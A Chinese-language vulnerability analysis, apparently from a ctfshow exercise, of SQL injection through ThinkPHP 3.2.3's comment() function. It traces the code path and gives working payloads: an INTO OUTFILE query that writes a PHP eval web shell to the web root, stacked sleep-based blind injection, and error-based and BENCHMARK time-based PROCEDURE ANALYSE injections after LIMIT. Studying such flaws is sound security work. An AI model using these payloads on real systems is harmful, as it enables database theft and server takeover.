漏洞详情
comment函数是用来进行查询注释功能,当执行sql语句时,搭配comment可能存在利用注释进行写shell或者时间盲注
漏洞复现
控制器写入demo
$user = M('Users')->comment($id)->find(intval($id));
payload
?id=1*/ into outfile "/var/www/html/3.php" LINES STARTING BY '<?php eval($_POST[0]);?>'/*
漏洞分析
首先看一下函数调用栈
开始跟进调试
跟进comment函数
给$options加上comment就是我们传入的东西
中间过程同thinkphp 3.2.3find 注入过程分析相同,往下走到这里select方法
跟进,对$options中的model和bind进行操作,不影响
跟进buildSelectSql()开始构建sql语句
跟进parseSql()
分析$options中的comment
跟进
我们传入的comment被加入到注释中,可以通过闭合前后注释进行注入
先尝试一下
构造的sql语句注入点在LIMIT 1 后面的地方,也就是说
SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT [注入点]
那么怎么利用这一点?
堆叠时间盲注
本地测试可以尝试堆叠注入方式来进行时间盲注
1*/;select if(substr(database(),1,1)='s',sleep(3),0)/*
ctfshow 题目环境下
LIMIT后 注入方法
Mysql下Limit注入方法 | 离别歌 (leavesongs.com)
Mysql注入点在limit关键字后面的利用方法 - 那天ws
此方法适用于MySQL 5.x中,在 limit语句后面的注入
首先查看 select 用法
SELECT[ALL | DISTINCT | DISTINCTROW ][HIGH_PRIORITY][STRAIGHT_JOIN][SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT][SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]select_expr [, select_expr ...][FROM table_references[WHERE where_condition][GROUP BY {col_name | expr | position}[ASC | DESC], ... [WITH ROLLUP]][HAVING where_condition][ORDER BY {col_name | expr | position}[ASC | DESC], ...][LIMIT {[offset,] row_count | row_count OFFSET offset}] //这里[PROCEDURE procedure_name(argument_list)][INTO OUTFILE 'file_name' export_options| INTO DUMPFILE 'file_name'| INTO var_name [, var_name]][FOR UPDATE | LOCK IN SHARE MODE]]
根据文章 有 两种方式
limit 关键字后面还有 PROCEDURE 和 INTO 关键字,INTO 关键字在有写权限可以用来写文件,这里看一下 PROCEDURE 关键字.MySQL默认可用的存储过程只有 ANALYSE (doc)
PROCEDURE
报错注入,payload
mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'
时间盲注
SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)
INTO
尝试利用 into outfile 写shell 虽然dumpfile也可以写文件但是因为 dumpfile 后面没有附加参数(export_options) 这点是 into outfile 利用的关键
看一下后面的参数
SELECT ... INTO OUTFILE 'file_name'[CHARACTER SET charset_name][export_options]export_options:[{FIELDS | COLUMNS}[TERMINATED BY 'string']//分隔符[[OPTIONALLY] ENCLOSED BY 'char'][ESCAPED BY 'char']][LINES[STARTING BY 'string'][TERMINATED BY 'string']]
OPTION 参数为可选参数选项,其可能的取值有:
`FIELDS TERMINATED BY '字符串'`:设置字符串为字段之间的分隔符,可以为单个或多个字符。默认值是“\t”。`FIELDS ENCLOSED BY '字符'`:设置字符来括住字段的值,只能为单个字符。默认情况下不使用任何符号。`FIELDS OPTIONALLY ENCLOSED BY '字符'`:设置字符来括住CHAR、VARCHAR和TEXT等字符型字段。默认情况下不使用任何符号。`FIELDS ESCAPED BY '字符'`:设置转义字符,只能为单个字符。默认值为“\”。`LINES STARTING BY '字符串'`:设置每行数据开头的字符,可以为单个或多个字符。默认情况下不使用任何字符。`LINES TERMINATED BY '字符串'`:设置每行数据结尾的字符,可以为单个或多个字符。默认值是“\n”。
给出payload
/?id=1*/ into outfile "/var/www/html/3.php" LINES STARTING BY '<?php eval($_POST[0]);?>'/*
